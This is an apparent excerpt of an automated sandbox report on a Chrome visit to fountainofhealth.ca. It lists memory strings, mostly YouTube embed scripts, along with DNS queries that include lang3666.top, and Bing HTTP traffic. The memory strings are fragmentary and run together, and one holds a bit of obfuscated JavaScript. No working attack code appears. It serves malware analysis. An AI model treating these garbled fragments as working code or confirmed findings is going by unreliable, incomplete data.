Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}[G],Z[(t=w+A,(t|0)-~(t&7)+~t)+(g&2)]=L,Z)[w+(2*(g|0)-(g|2)-(g^2)+2*(~g&2))]=-66,L},q=C),q}"},"sessionId":"26AC8CA9FC799C4CA68F0EFBB42866FD"} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2360507496.000028EC07A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}ce.js"},"sessionId":"26AC8CA9FC799C4CA68F0EFBB42866FD"} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2352362951.000028EC0648C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}eading .panel-title').removeClass('js-form-required form-required'); equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2500912249.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360620898.000028EC06828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2500912249.000028EC06828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}P$4c943c22-5c79-4450-af80-a88a7cf5104bf5104b equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}application/json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2485699742.000028EC0384C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2353212423.000028EC07C9C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}D equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2479146815.000028EC031B7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}"} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: {"action":"getScript","source":"writeEmbed();","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}:false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: {"action":"getTabUrl"}ource":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}iM equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: |https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRator equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2496441867.000028EC04960000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496441867.000028EC04960000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}ne":true,"dynamic":fale} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2495185106.000028EC047AC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488392167.000028EC03CA0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} B equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: || 'undte Array.prototype.entries;}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: fountainofhealth.ca
Source: global traffic DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic DNS traffic detected: DNS query: islonline.org
Source: global traffic DNS traffic detected: DNS query: lang3666.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: i.ytimg.com
Source: global traffic DNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: static.doubleclick.net
Source: global traffic DNS traffic detected: DNS query: yt3.ggpht.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: beacons.gcp.gvt2.com
Source: global traffic DNS traffic detected: DNS query: windomstatetheater.com
Source: global traffic DNS traffic detected: DNS query: beacons.gvt2.com
Source: global traffic DNS traffic detected: DNS query: beacons2.gvt2.com
Source: global traffic DNS traffic detected: DNS query: beacons3.gvt2.com
Source: global traffic DNS traffic detected: DNS query: beacons4.gvt2.com
Source: unknown HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: id
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 0content-type: application/jsoncache-control: privatevary: Accept-Encodingx-eventid: 682f3d25affc4384bc23e13ac651d3fbuseragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=x-xss-protection: 0p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"date: Thu, 22 May 2025 15:05:09 GMTset-cookie: MUIDB=4590362BB5CF472B95BBEDB3112D4B7B; expires=Tue, 16-Jun-2026 15:05:09 GMT; path=/; HttpOnlyalt-svc: h3=":443"; ma=93600x-cdn-traceid: 0.07d854b8.1747926309.1fcaf5cf
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 0content-type: application/jsoncache-control: privatevary: Accept-Encodingx-eventid: 682f3d2628224d83802d030cc0b39d1euseragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=x-xss-protection: 0p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"date: Thu, 22 May 2025 15:05:10 GMTset-cookie: MUIDB=4590362BB5CF472B95BBEDB3112D4B7B; expires=Tue, 16-Jun-2026 15:05:10 GMT; path=/; HttpOnlyalt-svc: h3=":443"; ma=93600x-cdn-traceid: 0.07d854b8.1747926310.1fcaf789
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 0content-type: application/jsoncache-control: privatevary: Accept-Encodingx-eventid: 682f3d26690d403fa3e82e2275b826efuseragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=x-xss-protection: 0p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"date: Thu, 22 May 2025 15:05:10 GMTset-cookie: MUIDB=4590362BB5CF472B95BBEDB3112D4B7B; expires=Tue, 16-Jun-2026 15:05:10 GMT; path=/; HttpOnlyalt-svc: h3=":443"; ma=93600x-cdn-traceid: 0.07d854b8.1747926310.1fcaf996
Source: chrome.exe, 00000000.00000003.2328954929.000028EC03360000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.jquery.com/prop/
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1/kiabhabjdbkj
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/acwmiglbaq6quecjufmamfsqupsa_2025.5.21.0/niikhdgajlph
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://dl.google.com/release2/chrome_component/lnu3li27zsanbe2hcsfjuvm5fq_1.0.7.1744928549/laoigpbln
Source: chrome.exe, 00000000.00000003.2322628658.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329979623.000028EC03DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329320398.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323618407.000028EC04B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.jquery.com/Tutorials:Introducing_$(document).ready()
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1/
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acgzb5szf7x3so2hvkfx32p7bbuq_9805/hfnkpim
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acwmiglbaq6quecjufmamfsqupsa_2025.5.21.0/
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/aevtvjsxpcrwhjvp5w32fej6zq_9.56.0/gcmjkmg
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fpm7b3lyymiazxgd7zkf5fvmra_2024.10.17.0/p
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/nei
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/l7xtcygg3vebugalfkm3b3dp3u_6.7431.9692/pk
Source: chrome.exe, 00000000.00000002.2489230157.000028EC03E54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313183913.000028EC04904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486226544.000028EC03934000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504920631.000028EC07968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fountainofhealth.ca/
Source: chrome.exe, 00000000.00000002.2489230157.000028EC03E54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fountainofhealth.ca//
Source: chrome.exe, 00000000.00000002.2487549813.000028EC03B90000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://fountainofhealth.ca/Home
Source: chrome.exe, 00000000.00000002.2468126281.000028EC022E6000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: chrome.exe, 00000000.00000003.2322628658.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329979623.000028EC03DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329320398.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323618407.000028EC04B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jquery.malsup.com/cycle/
Source: chrome.exe, 00000000.00000003.2320746478.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320644460.000028EC06CBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315094018.000028EC046E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322945815.000028EC06D60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319331070.000028EC06804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320841110.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jquery.malsup.com/form/#file-upload.
Source: chrome.exe, 00000000.00000003.2322628658.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329979623.000028EC03DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329320398.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323618407.000028EC04B98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jquery.malsup.com/license.html
